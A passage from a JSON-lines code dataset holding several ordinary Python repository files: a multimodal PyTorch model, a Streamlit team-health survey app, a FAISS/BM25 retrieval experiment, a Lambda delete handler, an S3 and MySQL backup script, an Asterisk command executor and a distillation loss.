[returnVal]\n\n\n\n\n\n\n\n\n\n","repo_name":"janakagithub/kb_genomeclassification","sub_path":"lib/kb_genomeclassification/kb_genomeclassificationImpl.py","file_name":"kb_genomeclassificationImpl.py","file_ext":"py","file_size_in_byte":13992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72921084247","text":"from typing import Any, Dict, List, Optional\n\nimport torch\nfrom slp.modules.feedback import Feedback\nfrom slp.modules.fuse import FuseAggregateTimesteps\nfrom slp.modules.mmdrop import MultimodalDropout\nfrom slp.modules.multimodal import MOSEIClassifier, MultimodalBaseline\n\n\nclass MMLatch(MultimodalBaseline):\n def __init__(\n self,\n text_size: int = 300,\n audio_size: int = 74,\n visual_size: int = 35,\n hidden_size: int = 100,\n dropout: float = 0.2,\n encoder_layers: float = 1,\n bidirectional: bool = True,\n merge_bi: str = \"sum\",\n rnn_type: str = \"lstm\",\n encoder_attention: bool = True,\n fuser_residual: bool = True,\n use_all_trimodal: bool = False,\n feedback: bool = True,\n use_self_feedback: bool = False,\n feedback_algorithm: str = \"rnn\",\n ):\n \"\"\"MMLatch implementation\n\n Multimodal baseline + feedback\n\n Args:\n text_size (int, optional): Text input size. Defaults to 300.\n audio_size (int, optional): Audio input size. Defaults to 74.\n visual_size (int, optional): Visual input size. Defaults to 35.\n hidden_size (int, optional): Hidden dimension. Defaults to 100.\n dropout (float, optional): Dropout rate. Defaults to 0.2.\n encoder_layers (float, optional): Number of encoder layers. Defaults to 1.\n bidirectional (bool, optional): Use bidirectional RNNs. Defaults to True.\n merge_bi (str, optional): Bidirectional merging method in the encoders. Defaults to \"sum\".\n rnn_type (str, optional): RNN type [lstm|gru]. Defaults to \"lstm\".\n encoder_attention (bool, optional): Use attention in the encoder RNNs. Defaults to True.\n fuser_residual (bool, optional): Use vilbert like residual in the attention fuser. Defaults to True.\n use_all_trimodal (bool, optional): Use all trimodal interactions for the Attention fuser. Defaults to False.\n feedback (bool, optional): Use top-down feedback. Defaults to True.\n use_self_feedback (bool, optional): If false use only crossmodal features for top-down feedback. If True also use the self modality. Defaults to False.\n feedback_algorithm (str, optional): Feedback module [rnn|boom|gated|downup]. Defaults to \"rnn\".\n \"\"\"\n super(MMLatch, self).__init__(\n text_size=text_size,\n audio_size=audio_size,\n visual_size=visual_size,\n hidden_size=hidden_size,\n dropout=dropout,\n encoder_layers=encoder_layers,\n bidirectional=bidirectional,\n merge_bi=merge_bi,\n rnn_type=rnn_type,\n encoder_attention=encoder_attention,\n fuser_residual=fuser_residual,\n use_all_trimodal=use_all_trimodal,\n )\n\n self.feedback = None\n\n if feedback:\n self.feedback = Feedback(\n hidden_size,\n [text_size, audio_size, visual_size],\n use_self=use_self_feedback,\n mask_type=feedback_algorithm,\n )\n\n @staticmethod\n def encoder_cfg(input_size: int, **cfg) -> Dict[str, Any]:\n \"\"\"Static method to create the encoder configuration\n\n The default configuration is provided here\n This configuration corresponds to the official paper implementation\n and is tuned for CMU MOSEI.\n\n Args:\n input_size (int): Input modality size\n **cfg: Optional keyword arguments\n\n Returns:\n Dict[str, Any]: The encoder configuration\n \"\"\"\n return {\n \"input_size\": input_size,\n \"hidden_size\": cfg.get(\"hidden_size\", 100),\n \"layers\": cfg.get(\"layers\", 1),\n \"bidirectional\": cfg.get(\"bidirectional\", True),\n \"dropout\": cfg.get(\"dropout\", 0.2),\n \"rnn_type\": cfg.get(\"rnn_type\", \"lstm\"),\n \"attention\": cfg.get(\"attention\", True),\n }\n\n @staticmethod\n def fuser_cfg(**cfg) -> Dict[str, Any]:\n \"\"\"Static method to create the fuser configuration\n\n The default configuration is provided here\n This configuration corresponds to the official paper implementation\n and is tuned for CMU MOSEI.\n\n Args:\n **cfg: Optional keyword arguments\n\n Returns:\n Dict[str, Any]: The fuser configuration\n \"\"\"\n return {\n \"n_modalities\": 3,\n \"dropout\": cfg.get(\"dropout\", 0.2),\n \"output_size\": cfg.get(\"hidden_size\", 100),\n \"hidden_size\": cfg.get(\"hidden_size\", 100),\n \"fusion_method\": \"attention\",\n \"timesteps_pooling_method\": \"rnn\",\n \"residual\": cfg.get(\"residual\", True),\n \"use_all_trimodal\": cfg.get(\"use_all_trimodal\", True),\n }\n\n def forward(\n self, *mods: torch.Tensor, lengths: Optional[torch.Tensor] = None\n ) -> torch.Tensor:\n encoded: List[torch.Tensor] = self._encode(*mods, lengths=lengths)\n\n if self.feedback is not None:\n mods_feedback: List[torch.Tensor] = self.feedback(\n mods, encoded, lengths=lengths\n )\n encoded = self._encode(*mods_feedback, lengths=lengths)\n\n fused = self._fuse(*encoded, lengths=lengths)\n\n return fused\n\n\nclass MMLatchClassifier(MOSEIClassifier):\n def __init__(\n self,\n num_classes: int = 1,\n text_size: int = 300,\n audio_size: int = 74,\n visual_size: int = 35,\n hidden_size: int = 100,\n ):\n enc = MMLatch(\n text_size=text_size,\n audio_size=audio_size,\n visual_size=visual_size,\n hidden_size=hidden_size,\n )\n super(MMLatchClassifier, self).__init__(enc, num_classes)\n\n def forward(\n self, mod_dict: Dict[str, torch.Tensor], lengths: Dict[str, torch.Tensor]\n ) -> torch.Tensor:\n mods = [mod_dict[\"text\"], mod_dict[\"audio\"], mod_dict[\"visual\"]]\n fused = self.enc(*mods, lengths=lengths[\"text\"])\n fused = self.drop(fused)\n out: torch.Tensor = self.clf(fused)\n\n return out\n","repo_name":"georgepar/slp","sub_path":"slp/modules/mmlatch.py","file_name":"mmlatch.py","file_ext":"py","file_size_in_byte":6221,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"31"} +{"seq_id":"2460419849","text":"from csv import reader\nimport pandas as pd\nimport streamlit as st\nfrom datetime import date\n\n'''\nAdmin Users taken from admins.csv file\n'''\nadmin_data = pd.read_csv('admins.csv')\nadmin_users = list(admin_data.Admins.unique())\n\n'''\nUtility function to convert DataFrame\nto CSV\n'''\ndef df_to_csv(df):\n return df.to_csv().encode('utf-8')\n\n'''\nUtility function to lookup \na particular value in a CSV\n'''\ndef csv_lookup(csv_file, lookup_value):\n file = open(csv_file)\n for row in reader(file):\n if lookup_value in row[0]:\n return row[1]\n\n'''\nCheck if a given user is an admin or not\n'''\ndef is_admin(user_email):\n if user_email in admin_users:\n return True\n return False\n\n'''\nBuild the streamlit sidebar conditionally if user is admin\n'''\ndef build_sidebar(user_email):\n if is_admin(user_email):\n sidebar = st.sidebar.selectbox(\"Select\", ['Questionaire', 'Admin'])\n else:\n sidebar = st.sidebar.selectbox(\"Select\", ['Questionaire'])\n return sidebar\n\n'''\nConvert words \"Negative\", \"Positive\" or \"Neutral\" to image paths of \ngreen, red or yellow dots that can be embedded in html\n'''\ndef path_to_image_html(word='Positive'):\n score = {'Positive': 'https://upload.wikimedia.org/wikipedia/commons/2/2d/Basic_green_dot.png',\n 'Negative': 'https://upload.wikimedia.org/wikipedia/commons/0/0e/Basic_red_dot.png',\n 'Neutral': 'https://upload.wikimedia.org/wikipedia/commons/thumb/9/91/Location_dot_orange.svg/768px-Location_dot_orange.svg.png'}\n path = score[word]\n return ''\n\n'''\nDetermine the overall sentiment score of a project with individual scores of\nthe members. Negative score has the highest weight to make sure negative\nexperiences are not overshadowed by majority positive experiences\n'''\ndef score(data, question):\n \n all_rates = list(data[question])\n neu = all_rates.count('Neutral')\n neg = all_rates.count('Negative')\n pos = all_rates.count('Positive')\n \n if (neg != 0) & (not 'Neutral' in all_rates) & (not 'Positive' in all_rates):\n return 'Negative'\n elif (pos != 0) & (not 'Neutral' in all_rates) & (not 'Negative' in all_rates):\n return 'Positive'\n elif (neu != 0) & (not 'Positive' in all_rates) & (not 'Negative' in all_rates):\n return 'Neutral'\n elif (neu > pos) & ('Negative' in all_rates):\n return 'Negative'\n elif (neu < pos) & ('Negative' in all_rates):\n return 'Neutral'\n elif (neu > pos) & (not 'Negative' in all_rates):\n return 'Neutral'\n elif (neu < pos) & (not 'Negative' in all_rates):\n return 'Positive'\n elif (neu == pos) & ('Negative' in all_rates):\n return 'Neutral'\n elif (neu == pos) & (not 'Negative' in all_rates):\n return 'Neutral'\n elif (neg == pos):\n return 'Neutral'\n\n'''\nRender the questions and the radio buttons in the questionaire\n'''\ndef render_radios(disabled=False):\n questions = [\"1) Team work\",\n \"2) Pawns or Players\",\n \"3) Delivery Value / Being Valued\",\n \"4) Speed\",\n \"5) Learning\",\n \"6) Fun\"]\n smiley_response = ['No Response', 'Happy 🙂', 'Neutral ðŸ˜�', 'Sad 😞']\n response_dict = {\n 'No Response' : 'na',\n 'Happy 🙂' : 'Positive',\n 'Neutral ðŸ˜�' : 'Neutral',\n 'Sad 😞' : 'Negative'\n }\n response_list = []\n col1, col2 = st.columns(2)\n if not disabled:\n for i in range(len(questions)):\n if i < 3:\n with col1:\n st.subheader(questions[i])\n response_list.append(response_dict[st.radio(\"Select your response: \", smiley_response, key=i)])\n else:\n with col2:\n st.subheader(questions[i])\n response_list.append(response_dict[st.radio(\"Select your response: \", smiley_response, key=i)])\n else:\n for i in range(len(questions)):\n if i < 3:\n with col1:\n st.subheader(questions[i])\n response_list.append(response_dict[st.radio(\"Select your response: \", smiley_response, key=i, disabled=True)])\n else:\n with col2:\n st.subheader(questions[i])\n response_list.append(response_dict[st.radio(\"Select your response: \", smiley_response, key=i, disabled=True)])\n return response_list\n\ndef main_page(user_email, user_name):\n today = date.today()\n\n st.title(\"InfraCloud Squad Health Application\")\n st.write('Refreshing the page will log you out')\n\n data = pd.read_csv('master_data.csv')\n team_data = pd.read_csv('teams.csv')\n page = build_sidebar(user_email)\n team_names = list(team_data.Team.unique())\n responses = []\n\n if(page == \"Questionaire\"):\n \n col7, col8, col10, col11 = st.columns([0.65,2,1,1])\n col7.markdown('

Select your team:

', unsafe_allow_html=True)\n current_team = col8.selectbox(\"You can add responses for multiple teams\", team_names)\n col10.empty\n col11.empty\n \n if pd.to_datetime(data.Date[(data.Email == user_email)&(data.Team == current_team)]).dt.month.max() == date.today().month and pd.to_datetime(data.Date[(data.Email == user_email)&(data.Team == current_team)]).dt.year.max() == date.today().year:\n responses = render_radios(disabled=True)\n else:\n responses = render_radios()\n\n st.write('')\n if st.button(\"Save Your Response\"):\n if current_team == '-':\n st.error('Please select your Team')\n elif 'na' in responses:\n st.error('Please respond to all questions')\n else:\n data = data.append({\n 'Date': today,\n 'Email': user_email,\n 'Name': user_name,\n 'Team': current_team,\n 'Team_work': responses[0],\n 'Pawns_or_Players': responses[1],\n 'Delivering_Value_Being_Valued': responses[2],\n 'Speed': responses[3],\n 'Learning': responses[4],\n 'Fun': responses[5]\n }, ignore_index=True)\n data.to_csv('master_data.csv', index=False)\n st.success('Response has been recorded')\n st.subheader('Your responses so far:')\n st.dataframe(data[data.Email == user_email])\n\n\n elif(page == \"Admin\"):\n questions = ['Team_work', 'Pawns_or_Players', 'Delivering_Value_Being_Valued', 'Speed', 'Learning', 'Fun']\n storage = {}\n rate = []\n \n teams = list(data.Team.unique())\n for tm in teams:\n for q in range(len(questions)):\n resp = score(data[data.Team == tm], questions[q])\n rate.append(resp)\n storage[tm] = rate\n rate = []\n new_data = pd.DataFrame(storage, index=questions)\n formatted_dict = {}\n for i in new_data.columns:\n formatted_dict[i]=path_to_image_html\n\n st.markdown('
'+new_data.to_html(escape=False,formatters=formatted_dict)+'
', unsafe_allow_html=True)\n new_data_csv = df_to_csv(new_data)\n st.download_button(\n label=\"Download as CSV\",\n data=new_data_csv,\n file_name='traffic_light.csv',\n mime='text/csv'\n )\n st.markdown('#')\n \n st.subheader('Filtered Table')\n col3, col4, col5, col6 = st.columns(4)\n with col3:\n project_filter = st.selectbox('Project', new_data.columns)\n with col4:\n st.empty\n with col5:\n st.empty\n with col6:\n st.empty\n filtered_data = data[data.Team == project_filter]\n st.markdown(filtered_data.to_html(escape=False,formatters=dict(Team_work=path_to_image_html,\n Pawns_or_Players=path_to_image_html,\n Delivering_Value_Being_Valued=path_to_image_html,\n Speed=path_to_image_html,\n Learning=path_to_image_html,\n Fun=path_to_image_html)), unsafe_allow_html=True)\n st.markdown('#')\n st.subheader('All user data')\n st.dataframe(data)\n with open('master_data.csv') as dl:\n st.download_button('Download as CSV', dl, 'data.csv', 'text/csv')\n","repo_name":"infracloudio/squad_health","sub_path":"questionaire.py","file_name":"questionaire.py","file_ext":"py","file_size_in_byte":8852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32395552229","text":"import msgpack\nimport nltk\nfrom nltk.corpus import stopwords\nfrom tqdm import tqdm\nimport json\nimport os\nimport pickle\nimport faiss\nimport numpy as np\n\nfrom explanation_retrieval.ranker.bm25_v2 import BM25\nfrom explanation_retrieval.ranker.relevance_score import RelevanceScore\nfrom explanation_retrieval.ranker.explanatory_power_v2 import ExplanatoryPower\nfrom explanation_retrieval.ranker.utils import Utils\nfrom sentence_transformers import SentenceTransformer\n\n#load utils\nutils = Utils()\nutils.init_explanation_bank_lemmatizer()\n\n#Load facts bank\nwith open(\"entailmentbank/data/worldtree_corpus_sentences_extended.json\", 'r') as f:\n knowledge_train = json.load(f)\n\n#Load train and dev set (explanations corpus)\nwith open(\"entailmentbank/data/hypotheses_train.json\", 'r') as f:\n hypotheses_train = json.load(f)\n\nwith open(\"entailmentbank/data/chains_train.json\", 'r') as f:\n chains_train = json.load(f)\n\nwith open(\"entailmentbank/data/hypotheses_test.json\", 'r') as f:\n hypotheses_test = json.load(f)\n\nwith open(\"entailmentbank/data/chains_test.json\", 'r') as f:\n chains_test = json.load(f)\n\n\n#load dense model\ndense_model_name = './models/en_bank_nli'\ndense_model = SentenceTransformer(dense_model_name)\n\n######### BUILD THE FAISS INDEX ###########\n\n#parameters\nmax_corpus_size = len(knowledge_train.items())\nembedding_cache_path = 'embeddings-size-{}.pkl'.format(max_corpus_size)\n# embedding_cache_path='embeddings-size-11941.pkl'\nembedding_size = 768 #Size of embeddings\ntop_k_hits = 1000 #Output k hits\ncorpus_sentences = []\ncorpus_ids_original = []\n\n#Defining our FAISS index\n#Number of clusters used for faiss. Select a value 4*sqrt(N) to 16*sqrt(N) - https://github.com/facebookresearch/faiss/wiki/Guidelines-to-choose-an-index\nn_clusters = 282\n#We use Inner Product (dot-product) as Index. We will normalize our vectors to unit length, then is Inner Product equal to cosine similarity\nquantizer = faiss.IndexFlatIP(embedding_size)\nindex = faiss.IndexIVFFlat(quantizer, embedding_size, n_clusters, faiss.METRIC_INNER_PRODUCT)\n#Number of clusters to explorer at search time. We will search for nearest neighbors in 10 clusters.\nindex.nprobe = 110\n\n#Check if embedding cache path exists\nif not os.path.exists(embedding_cache_path):\n #Check if the dataset exists. If not, extract\n for t_id, ts in tqdm(knowledge_train.items()):\n\n corpus_sentences.append(ts)\n corpus_ids_original.append(t_id)\n\n print(\"Encode the corpus. This might take a while\")\n corpus_embeddings = dense_model.encode(corpus_sentences, show_progress_bar=True, convert_to_numpy=True)\n\n print(\"Store file on disc\")\n with open(embedding_cache_path, \"wb\") as fOut:\n pickle.dump({'ids': corpus_ids_original, 'sentences': corpus_sentences, 'embeddings': corpus_embeddings}, fOut)\nelse:\n print(\"Load pre-computed embeddings from disc\")\n with open(embedding_cache_path, \"rb\") as fIn:\n cache_data = pickle.load(fIn)\n corpus_ids_original = cache_data['ids']\n corpus_sentences = cache_data['sentences']\n corpus_embeddings = cache_data['embeddings']\n\n### Create the FAISS index\nprint(\"Start creating FAISS index\")\n# First, we need to normalize vectors to unit length\ncorpus_embeddings = corpus_embeddings / np.linalg.norm(corpus_embeddings, axis=1)[:, None]\n# Then we train the index to find a suitable clustering\nindex.train(corpus_embeddings)\n# Finally we add all embeddings to the index\nindex.add(corpus_embeddings)\n\nprint(\"Corpus loaded with {} sentences / embeddings\".format(len(corpus_sentences)))\n\n\n\n######### MULTI-HOP EXPLANATION REGENERATION ###########\n\n# open output files to save the final results\npred_q = open(\"entailmentbank/outputs/prediction_top50.txt\", \"w\")\nout_q = open(\"entailmentbank/outputs/retireval_top50.txt\", \"w\")\n\n# Parameters\nK = 1000 # relevance limit\nQ = 80 # similar hypotheses limit\nQK = 70 # explanatory power limit\nweights = [0.89, 0.11] # relevance and explanatory power weigths\n#eb_dataset = hypotheses_test # test dataset to adopt for the experiment\n# -------------------------------------------------------------\nhypotheses_dataset = hypotheses_test # test hypotheses to adopt for the experiment\n\nIterations = 9 # number of iterations\n\n# load and fit the sparse model\nsparse_model = BM25()\nfacts_bank_lemmatized = []\nexplanations_corpus_lemmatized = []\nids = []\nq_ids = []\n# construct sparse index for the facts bank\nfor t_id, ts in tqdm(knowledge_train.items()):\n temp = []\n # facts lemmatization\n for word in nltk.word_tokenize(ts):\n temp.append(utils.explanation_bank_lemmatize(word.lower()))\n lemmatized_fact = \" \".join(temp)\n facts_bank_lemmatized.append(lemmatized_fact)\n ids.append(t_id)\n\n# construct sparse index for the explanations corpus\nfor q_id, exp in tqdm(hypotheses_train.items()):\n temp = []\n # question lemmatization\n for word in nltk.word_tokenize(exp):\n temp.append(utils.explanation_bank_lemmatize(word.lower()))\n lemmatized_question = \" \".join(temp)\n explanations_corpus_lemmatized.append(lemmatized_question)\n q_ids.append(q_id)\n#fit the sparse model\nsparse_model.fit(facts_bank_lemmatized, explanations_corpus_lemmatized, ids, q_ids)\n\n#load relevance and explanatory power using the sparse model\nRS = RelevanceScore(sparse_model)\nPW = ExplanatoryPower(sparse_model, chains_train)\n\npre_dict={}\n# Perform multi-hop inference for explanation regeneration and save the results\nfor q_id, exp in tqdm(hypotheses_dataset.items()):\n # initialize the partially constructed explanation as an empty list\n partial_explanation = []\n question=exp\n # lemmatization and stopwords removal\n temp = []\n for word in nltk.word_tokenize(exp):\n if not word.lower() in stopwords.words(\"english\"):\n temp.append(utils.explanation_bank_lemmatize(word.lower()))\n lemmatized_question = \" \".join(temp)\n\n # compute the explanatory power given the hypothesis\n explanatory_power = PW.compute(q_id, lemmatized_question, Q, QK)\n\n print(\"===========================================\", file = out_q)\n\n # for each iteration\n for step in range(Iterations):\n #print the query\n print(\"---------------------------------------------\", file = out_q)\n print(\"Query\", step, question, file = out_q)\n print(\"---------------------------------------------\", file = out_q)\n\n # Compute the relevance score using the sparse model\n relevance_scores_sparse = RS.compute(lemmatized_question, K)\n\n # Compute the relevance score using the dense model\n question_embedding = dense_model.encode(question)\n # FAISS works with inner product (dot product). When we normalize vectors to unit length, inner product is equal to cosine similarity\n question_embedding = question_embedding / np.linalg.norm(question_embedding)\n question_embedding = np.expand_dims(question_embedding, axis=0)\n # Search in FAISS. It returns a matrix with distances and corpus ids.\n distances, corpus_ids = index.search(question_embedding, top_k_hits)\n # We extract corpus ids and scores for the query\n hits = [{'corpus_id': id, 'score': score} for id, score in zip(corpus_ids[0], distances[0])]\n hits = sorted(hits, key=lambda x: x['score'], reverse=True)\n #save the relevance scores computed using the dense model\n relevance_scores_dense = {}\n for hit in hits[0:top_k_hits]:\n relevance_scores_dense[corpus_ids_original[hit['corpus_id']]] = hit['score']\n\n #compute the explanatory score for each element in the facts bank\n explanatory_scores = {}\n for t_id, ts in knowledge_train.items():\n if not t_id in explanatory_power:\n explanatory_power[t_id] = 0\n if not t_id in relevance_scores_sparse:\n relevance_scores_sparse[t_id] = 0\n if not t_id in relevance_scores_dense:\n relevance_scores_dense[t_id] = 0\n explanatory_scores[t_id] = weights[0] * (relevance_scores_sparse[t_id] + relevance_scores_dense[t_id]) + weights[1] * (explanatory_power[t_id])\n\n # select the best fact and save the partial explanation\n for fact in sorted(explanatory_scores, key=explanatory_scores.get, reverse=True):\n if not fact in partial_explanation:\n to_write = q_id + \"\\t\" + fact\n print(to_write, file=pred_q)\n if fact in chains_test[q_id]:\n print(knowledge_train[fact], \"***\", file = out_q)\n else:\n print(knowledge_train[fact], file = out_q)\n # update the partial explanation\n partial_explanation.append(fact)\n break\n\n # update the query concatenating it with the partially constructed explanation\n question = hypotheses_dataset[q_id]\n for fact in partial_explanation:\n question += \". \" +knowledge_train[fact]\n # lemmatization and stopwords removal\n temp = []\n for word in nltk.word_tokenize(question):\n if not word.lower() in stopwords.words(\"english\"):\n temp.append(utils.explanation_bank_lemmatize(word.lower()))\n lemmatized_question = \" \".join(temp)\n pre_list = partial_explanation\n # rank the remaining sentences in the facts bank\n print_count = 0\n for fact in sorted(explanatory_scores, key=explanatory_scores.get, reverse=True):\n if not fact in partial_explanation:\n to_write = q_id + \"\\t\" + fact\n print(to_write, file=pred_q)\n if print_count < 41:\n if fact in chains_test[q_id]:\n pre_list.append(fact)\n print(knowledge_train[fact], \"***\", file = out_q)\n else:\n pre_list.append(fact)\n print(knowledge_train[fact], file = out_q)\n print_count += 1\n\n pre_dict[q_id]=pre_list\n\nwith open(\"entailmentbank/outputs/pre_test_top50.json\",'w') as f:\n json.dump(pre_dict, f)\n\npred_q.close()\nout_q.close()\n\n","repo_name":"hhhhzs666/KSIHER","sub_path":"knowledge_select_experiment.py","file_name":"knowledge_select_experiment.py","file_ext":"py","file_size_in_byte":10102,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"37511302856","text":"\"\"\"商品削除API.\"\"\"\nimport os\nimport boto3\nfrom lib.utils import response_builder\nfrom lib.decorators import api_handler\nfrom boto3.dynamodb.conditions import Key\nfrom botocore.exceptions import ClientError\n\n\n@api_handler\ndef handler(event, context):\n \"\"\"商品削除API.\"\"\"\n try:\n # URLパスから更新対象の商品IDを取得\n product_id = event.get('pathParameters').get('productId')\n\n dynamodb = boto3.resource(\n 'dynamodb',\n endpoint_url=os.getenv('DynamoDBEndpoint')\n )\n products_table = dynamodb.Table(os.getenv('ProductsTableName'))\n\n # 更新対象の存在チェック\n products_table.get_item(Key={\n 'Id': product_id,\n 'Key': 'owner'\n })\n\n # 削除対象のデータを取得\n result = products_table.query(\n KeyConditionExpression=Key('Id').eq(product_id)\n )\n\n # 対象データの削除\n for item in result.get('Items'):\n products_table.delete_item(Key={\n 'Id': product_id,\n 'Key': item.get('Key')\n })\n\n return response_builder(204, {})\n except ClientError as e:\n if e.response['Error']['Code'] == 'ResourceNotFoundException':\n return response_builder(404, {\n 'error_message': 'request data is not found'\n })\n raise e\n except Exception as e:\n raise e\n","repo_name":"serverless-operations/product-api-example","sub_path":"handlers/products/delete.py","file_name":"delete.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"7963753658","text":"class BackupDir:\n @classmethod\n def start(cls):\n import os\n from config import SystemConfig\n from aws import S3\n\n dir = SystemConfig.dir_to_upload()\n file_exceptions = SystemConfig.exceptions()\n\n # doing loop in directory\n for file in os.scandir(dir):\n # loop in exeptions for each file, verify extension exception\n ignore = False\n for extension_exception in file_exceptions:\n # if file extension equal any in exception, so ignore\n if file.path.endswith(\".\" + extension_exception):\n print('Arquivo ignorado (extenção na lista de exceção): ' + file.path)\n ignore = True\n continue\n # else go to upload files\n if not ignore and os.path.isfile(file.path) and S3.upload_file(file.path):\n print('Upload de ' + file.path + \" realizado com sucesso.\\n\")\n elif not ignore:\n print('Erro na hora de fazer upload do arquivo: ' + file.path + \"\\n\")\n\n\nclass BackupMySQL:\n @classmethod\n def start(cls):\n import os\n import time\n from config import SystemConfig\n from aws import S3\n from config import MySQLConfig\n\n DB_HOST = MySQLConfig.host()\n DB_USER = MySQLConfig.user()\n DB_USER_PASSWORD = MySQLConfig.password()\n DB_NAME = MySQLConfig.dbname()\n BACKUP_PATH = os.path.abspath(SystemConfig.dir_to_upload() + \"database_backup\")\n\n if not os.path.isdir(BACKUP_PATH):\n os.mkdir(BACKUP_PATH)\n\n # Getting current DateTime to create the separate backup folder like \"20210530-123433\".\n DATETIME = time.strftime('%Y%m%d-%H%M%S')\n bkp_file = (BACKUP_PATH + \"\\\\\" + DB_NAME + '-' + DATETIME + '.sql\"')\n dumpcmd = 'mysqldump -h' + DB_HOST + ' -u' + DB_USER + ' -p' + DB_USER_PASSWORD + ' ' + DB_NAME + ' > \"' + bkp_file\n os.system(dumpcmd)\n\n print('')\n print('Script de backup completo\\n')\n print('Arquivo de backup criado com sucesso.')\n if SystemConfig.upload_to_s3_after_mysql_backup():\n print('Fazendo upload para AWS S3')\n S3.upload_file(SystemConfig.dir_to_upload() + \"database_backup/\" + DB_NAME + '-' + DATETIME + '.sql')\n print('Arquivo de backup enviado para S3');\n","repo_name":"edsonmoretti/backup-to-s3","sub_path":"backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8591925148","text":"# Fibonacci Sequence\r\n# 0, 1, 1, 2, 3, 5, 8, 13, 21, 34,...\r\n\r\n# let's make it 20 pieces fNumbers\r\n\r\nx = 1\r\ny = 1\r\nfibonacci = [x, y]\r\nfor f in range(21):\r\n x, y = y, x + y\r\n fibonacci.append(y)\r\n\r\nprint(fibonacci)","repo_name":"Nihilnia/reset","sub_path":"Day 4 -Fibonacci Sequence.py","file_name":"Day 4 -Fibonacci Sequence.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"6719357136","text":"import logging\nimport os\nimport subprocess\nimport uuid\n\nfrom wazo_sysconfd.plugins.request_handlers.command import Command\nfrom xivo_bus.resources.sysconfd.event import AsteriskReloadProgressEvent\n\nlogger = logging.getLogger(__name__)\n\n\nclass AsteriskCommandFactory:\n _COMMANDS = [\n 'core reload',\n 'core restart now',\n 'dialplan reload',\n 'moh reload',\n 'iax2 reload',\n 'module reload app_queue.so',\n 'module reload features',\n 'module reload res_parking.so',\n 'module reload res_pjsip.so',\n 'voicemail reload',\n 'module reload chan_sccp.so',\n 'module reload app_confbridge.so',\n 'module reload res_rtp_asterisk.so',\n 'module reload res_hep.so',\n ]\n _ARG_COMMANDS = ['sccp reset']\n\n def __init__(self, asterisk_command_executor):\n self._executor = asterisk_command_executor\n\n def new_command(self, value, request, **options):\n self._check_validity(value)\n return Command(value, request, self._executor, value, **options)\n\n def _check_validity(self, value):\n if value in self._COMMANDS:\n return\n for arg_cmd in self._ARG_COMMANDS:\n if value.startswith(arg_cmd):\n return\n raise ValueError('unauthorized command')\n\n\nclass AsteriskCommandExecutor:\n def __init__(self, bus_publisher):\n self._bus_publisher = bus_publisher\n self._null = open(os.devnull)\n\n def execute(self, command: Command, data, *, publish: bool = True):\n command_string = data\n request_uuids = [request.uuid for request in command.requests]\n task_uuid = str(uuid.uuid4())\n\n if publish:\n self.publish_status(task_uuid, 'starting', command_string, request_uuids)\n\n if command_string == 'module reload res_pjsip.so':\n cmd = ['wazo-confgen', 'asterisk/pjsip.conf', '--invalidate']\n subprocess.call(cmd, stdout=self._null, close_fds=True)\n\n exit_code = subprocess.call(\n ['asterisk', '-rx', command_string], stdout=self._null, close_fds=True\n )\n if exit_code:\n logger.error('asterisk returned non-zero status code %s', exit_code)\n\n if publish:\n self.publish_status(task_uuid, 'completed', command_string, request_uuids)\n\n def publish_status(\n self, task_uuid: str, status: str, command: str, request_uuids: list\n ) -> None:\n self._bus_publisher.publish(\n AsteriskReloadProgressEvent(task_uuid, status, command, request_uuids)\n )\n","repo_name":"wazo-platform/wazo-sysconfd","sub_path":"wazo_sysconfd/plugins/request_handlers/asterisk.py","file_name":"asterisk.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18515171228","text":"import torch.nn as nn\nimport torch.nn.functional as F\nfrom depth.ops import resize\n\nfrom depth.models.builder import LOSSES\n\n@LOSSES.register_module()\nclass SimilarityMSELoss(nn.Module):\n \"\"\"MSELoss.\n Args:\n loss_weight (float, optional): The weight of the loss. Defaults to 1.0\n \"\"\"\n\n def __init__(self, loss_weight=1.0, patch_w=1, patch_h=1):\n super().__init__()\n self.loss_weight = loss_weight\n\n self.patch_w = patch_w\n self.patch_h = patch_h\n self.maxpool = nn.MaxPool2d(kernel_size=(self.patch_h, self.patch_w), stride=(self.patch_h, self.patch_w), padding=0, ceil_mode=True)\n\n def forward(self,\n feat_s,\n feat_t,\n depth_gt_resized):\n \"\"\"Forward function of loss.\n Args:\n feat_s (torch.Tensor): Feats from student\n feat_t (torch.Tensor): Feats form teacher\n depth_gt_resized (torch.Tensor): depth_gt_resized\n Returns:\n torch.Tensor: The calculated loss\n \"\"\"\n N, C_s, H, W = feat_s.shape\n N, C_t, H, W = feat_t.shape\n\n #maxpool = nn.MaxPool2d(kernel_size=(patch_h, patch_w), stride=(patch_h, patch_w), padding=0, ceil_mode=True)\n feat_s = self.maxpool(feat_s)\n feat_t= self.maxpool(feat_t)\n\n depth_gt_resized = resize(\n input=depth_gt_resized,\n size=[feat_s.shape[-2], feat_s.shape[-1]],\n mode='nearest',\n align_corners=None,\n warning=False)\n\n loss = 0\n for i in range(N):\n mask_i = depth_gt_resized[i, :, :, :]\n feat_s_i = feat_s[i, :, :, :]\n feat_t_i = feat_t[i, :, :, :]\n\n valid_mask = mask_i > 0\n mask = valid_mask.expand(feat_s_i.shape).contiguous()\n valid_feat_s_i = feat_s_i[mask].reshape(C_s, -1)\n mask = valid_mask.expand(feat_t_i.shape).contiguous()\n valid_feat_t_i = feat_t_i[mask].reshape(C_t, -1)\n\n # norm the C dim\n valid_feat_s_i = F.normalize(valid_feat_s_i, p=2, dim=0)\n valid_feat_t_i = F.normalize(valid_feat_t_i, p=2, dim=0)\n\n similarity_s_i = valid_feat_s_i.permute(1, 0) @ valid_feat_s_i\n similarity_t_i = valid_feat_t_i.permute(1, 0) @ 